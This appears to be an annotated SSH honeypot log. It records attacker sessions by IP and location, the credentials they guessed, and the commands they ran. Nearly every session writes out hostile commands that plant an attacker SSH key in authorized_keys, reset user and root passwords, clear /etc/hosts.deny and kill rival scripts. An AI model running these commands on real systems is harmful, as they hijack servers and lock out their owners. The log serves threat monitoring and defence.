$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_7 (116.123.150.231) β€” Suwon, South Korea Β· 1 session Β· 20 cmds
2026-05-28 18:37 EDT Β· as gitlab-runner/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nxhkjeLRjqVT9\nxhkjeLRjqVT9"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nxhkjeLRjqVT9\nxhkjeLRjqVT9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe_root_9 (85.69.240.210) β€” Chambray-lΓ¨s-Tours, France Β· 2 sessions Β· 40 cmds
2026-05-28 18:22 EDT Β· as db2inst1/passw0rd, ntc/ntc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "passw0rd\nZhSnQrrwrpR9\nZhSnQrrwrpR9"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "passw0rd\nZhSnQrrwrpR9\nZhSnQrrwrpR9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ntc123\n5VtnmJTwWpRR\n5VtnmJTwWpRR"|passwd|bash
$ echo "ntc123\n5VtnmJTwWpRR\n5VtnmJTwWpRR\n"|passwd
🎭 burger_root_31 (67.205.160.232) β€” North Bergen, United States Β· 2 sessions Β· 40 cmds
2026-05-28 18:20 EDT Β· as db2inst1/passw0rd, ntc/ntc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "ntc123\nAwAEeotrhXRO\nAwAEeotrhXRO"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "ntc123\nAwAEeotrhXRO\nAwAEeotrhXRO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "passw0rd\nkB2fCDc2rmYx\nkB2fCDc2rmYx"|passwd|bash
$ echo "passw0rd\nkB2fCDc2rmYx\nkB2fCDc2rmYx\n"|passwd
🎭 panda_root_15 (106.225.192.15) β€” Taohua, China Β· 1 session Β· 19 cmds
2026-05-28 18:03 EDT Β· as root/ZAQ!2wsxCDE#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:IK4NXNHVApYu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 acai_root_3 (45.162.8.14) β€” SΓ£o Paulo, Brazil Β· 5 sessions Β· 98 cmds
2026-05-28 16:36 EDT Β· as amine/amine, amir/amir1234, erpnext/erpnext@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "amine\n8N2j8b5AS4fy\n8N2j8b5AS4fy"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "amine\n8N2j8b5AS4fy\n8N2j8b5AS4fy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo "root:h8cVWEkViQUo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo -e "amir1234\nW5OsNliAIIfo\nW5OsNliAIIfo"|passwd|bash
$ echo "amir1234\nW5OsNliAIIfo\nW5OsNliAIIfo\n"|passwd
$ echo "root:euy4p9ElBRkM"|chpasswd|bash
$ echo -e "erpnext@123\n0FxdyN5oGYvU\n0FxdyN5oGYvU"|passwd|bash
$ echo "erpnext@123\n0FxdyN5oGYvU\n0FxdyN5oGYvU\n"|passwd
🎭 acai_root_4 (136.248.121.226) β€” SΓ£o Paulo, Brazil Β· 2 sessions Β· 40 cmds
2026-05-28 16:37 EDT Β· as github/123, training/training
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "training\nHVBMT8nRoYPD\nHVBMT8nRoYPD"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "training\nHVBMT8nRoYPD\nHVBMT8nRoYPD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nssV3xh9iL6q6\nssV3xh9iL6q6"|passwd|bash
$ echo "123\nssV3xh9iL6q6\nssV3xh9iL6q6\n"|passwd
🎭 ghost_root_67 (103.146.202.174) β€” Cicurug, Indonesia Β· 5 sessions Β· 98 cmds
2026-05-28 16:34 EDT Β· as amine/amine, amir/amir1234, erpnext/erpnext@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:rZn6pP6b9sya"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "amir1234\nxOtavzMA6oh6\nxOtavzMA6oh6"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "amir1234\nxOtavzMA6oh6\nxOtavzMA6oh6\n"|passwd
$ echo -e "erpnext@123\nRN4teteC2tbL\nRN4teteC2tbL"|passwd|bash
$ echo "erpnext@123\nRN4teteC2tbL\nRN4teteC2tbL\n"|passwd
$ echo "root:WphQyawePUxf"|chpasswd|bash
$ echo -e "amine\nbCM2iuvuXwGn\nbCM2iuvuXwGn"|passwd|bash
$ echo "amine\nbCM2iuvuXwGn\nbCM2iuvuXwGn\n"|passwd
🎭 seoul_root_13 (211.178.247.182) β€” Yeonje-gu, South Korea Β· 3 sessions Β· 59 cmds
2026-05-28 16:32 EDT Β· as github/123, root/hesoyam, training/training
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "training\n1wc7kZaqoEhr\n1wc7kZaqoEhr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "training\n1wc7kZaqoEhr\n1wc7kZaqoEhr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:OGTHCvvVGSIc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123\noKVzPdlnmBch\noKVzPdlnmBch"|passwd|bash
$ echo "123\noKVzPdlnmBch\noKVzPdlnmBch\n"|passwd
🎭 bibimbap_root_8 (221.156.126.1) β€” Yeosu, South Korea Β· 3 sessions Β· 60 cmds
2026-05-08 10:55 EDT Β· as github/123, training/training, user1/user2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\nkNHM5sG3Sb2e\nkNHM5sG3Sb2e"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123\nkNHM5sG3Sb2e\nkNHM5sG3Sb2e\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "training\nCgu5WMGH9iHk\nCgu5WMGH9iHk"|passwd|bash
$ echo "training\nCgu5WMGH9iHk\nCgu5WMGH9iHk\n"|passwd
$ echo -e "user2\nwFs84KtuYYIK\nwFs84KtuYYIK"|passwd|bash
$ echo "user2\nwFs84KtuYYIK\nwFs84KtuYYIK\n"|passwd
🎭 yankee_root_24 (74.208.17.168) β€” Kansas City, United States Β· 3 sessions Β· 59 cmds
2026-05-28 16:37 EDT Β· as github/123, root/hesoyam, training/training
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "training\nnvC4zdDLsvjA\nnvC4zdDLsvjA"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "training\nnvC4zdDLsvjA\nnvC4zdDLsvjA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123\nSI0PZXANDvC3\nSI0PZXANDvC3"|passwd|bash
$ echo "123\nSI0PZXANDvC3\nSI0PZXANDvC3\n"|passwd
$ echo "root:BsfxwudfsC6i"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_51 (81.9.145.130) β€” Esgos, Spain Β· 3 sessions Β· 58 cmds
2026-05-28 16:31 EDT Β· as root/Root@2026, root/assassin, ubuntu/123.com
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:b3ya0WKgw0Wy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123.com\nVK1K66OqI0Bs\nVK1K66OqI0Bs"|passwd|bash
$ Enter new UNIX password:
$ echo "123.com\nVK1K66OqI0Bs\nVK1K66OqI0Bs\n"|passwd
$ echo "root:XSPNFDBntzoc"|chpasswd|bash
🎭 yankee_root_25 (136.0.197.110) β€” Los Angeles, United States Β· 3 sessions Β· 58 cmds
2026-05-28 16:35 EDT Β· as amine/amine, root/aa112233, root/aaAA123123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:g532sOOR3Hse"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
